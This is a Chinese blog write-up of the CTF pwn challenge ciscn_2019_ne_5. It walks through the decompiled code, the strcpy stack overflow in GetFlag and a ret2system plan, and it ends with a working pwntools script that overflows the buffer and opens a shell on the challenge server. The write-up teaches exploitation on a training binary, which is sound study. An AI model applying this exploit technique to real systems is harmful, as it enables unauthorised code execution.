加载头像

ciscn_2019_ne_5

ubuntu18

0x01

checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/ciscn_2019_ne_5/ciscn_2019_ne_5'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled		//栈不可执行
    PIE:      No PIE (0x8048000)

运行之后直接得到了shell …

IDA

main()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int result; // eax
  int v4; // [esp+0h] [ebp-100h] BYREF
  char src[4]; // [esp+4h] [ebp-FCh] BYREF
  char v6[124]; // [esp+8h] [ebp-F8h] BYREF
  char s1[4]; // [esp+84h] [ebp-7Ch] BYREF
  char v8[96]; // [esp+88h] [ebp-78h] BYREF
  int *v9; // [esp+F4h] [ebp-Ch]

  v9 = &argc;
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  fflush(stdout);
  *(_DWORD *)s1 = 48;
  memset(v8, 0, sizeof(v8));
  *(_DWORD *)src = 48;
  memset(v6, 0, sizeof(v6));
  puts("Welcome to use LFS.");
  printf("Please input admin password:");
  __isoc99_scanf("%100s", s1);
  if ( strcmp(s1, "administrator") )	//输入administrator跳过exit()
  {
    puts("Password Error!");
    exit(0);
  }
  puts("Welcome!");
  puts("Input your operation:");
  puts("1.Add a log.");
  puts("2.Display all logs.");
  puts("3.Print all logs.");
  printf("0.Exit\n:");
  __isoc99_scanf("%d", &v4);
  switch ( v4 )
  {
    case 0:
      exit(0);
      return result;
    case 1:									//写入字符串
      AddLog(src);
      result = sub_804892B(argc, argv, envp);
      break;
    case 2:									//无用
      Display(src);
      result = sub_804892B(argc, argv, envp);
      break;
    case 3:									//无用
      Print();
      result = sub_804892B(argc, argv, envp);
      break;
    case 4:
      GetFlag(src);							//可疑函数
      result = sub_804892B(argc, argv, envp);
      break;
    default:
      result = sub_804892B(argc, argv, envp);
      break;
  }
  return result;
}

Addlog()

1
2
3
4
5
int __cdecl AddLog(int a1)
{
  printf("Please input new log info:");
  return __isoc99_scanf("%128s", a1);		//此处写入src
}

GetFlag()

1
2
3
4
5
6
7
8
9
10
int __cdecl GetFlag(char *src)
{
  char dest[4]; // [esp+0h] [ebp-48h] BYREF
  char v3[60]; // [esp+4h] [ebp-44h] BYREF

  *(_DWORD *)dest = 48;
  memset(v3, 0, sizeof(v3));
  strcpy(dest, src);			//可以利用src控制dest使溢出
  return printf("The flag is your log:%s\n", dest);
}

0x02

思路

  1. 控制src (48H)
  2. strcpy(dest,src)处溢出至system() //0x80484D0

存在sh字符串

LOAD:080482E6 00000007 C fflush

080482E0 5F 75 73 65 64 00 66 66 6C 75 73 68 00 73 74 72 _used.fflush.str

取0x80482EA即可

s 0x48H
ebp 0x4
ret system()
system_ret 0xdeadbeef
arg sh

0x03

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *

io = remote('node4.buuoj.cn', 26736)

context(os='linux', arch='i386', log_level='debug')
io.sendlineafter(b'rd:', b'administrator')
io.sendlineafter(b'on:', b'1')
padding = 0x48 + 0x4
system = 0x80484D0
sh = 0x80482EA
payload = b'a' * padding + p32(system) + p32(0xdeadbeef) + p32(sh)
io.sendlineafter(b'fo:', payload)
io.sendline(b'4')
io.interactive()

评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果
avatar
这有关于运维、开发、后端相关的问题和看法。
相信你可以在这里找到对你有用的知识教程

Zelas2Xerath

技术苑
公告
2024/10/1-跟进上游更新
.NET1AMD1AWX1ChinaSkills2DIY1DirectX1GPU1IDA1KVM1Linux1Markdown1Office1Openwrt8Potplayer1Pwn1Python1RHCE1RHCSA1Redhat2Runtimes4Ryzen1Windows12ansible1cpu3eNSP1hexo2idm1iperf1pip1pwn1python1云计算2显示器1样题2职业技能大赛2虚拟化1装机3超频2配置单2金砖2
归档
网站资讯
文章总数 :
54
建站天数 :
全站字数 :
85.2k
总访客数 :
总访问量 :
最后更新 :
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體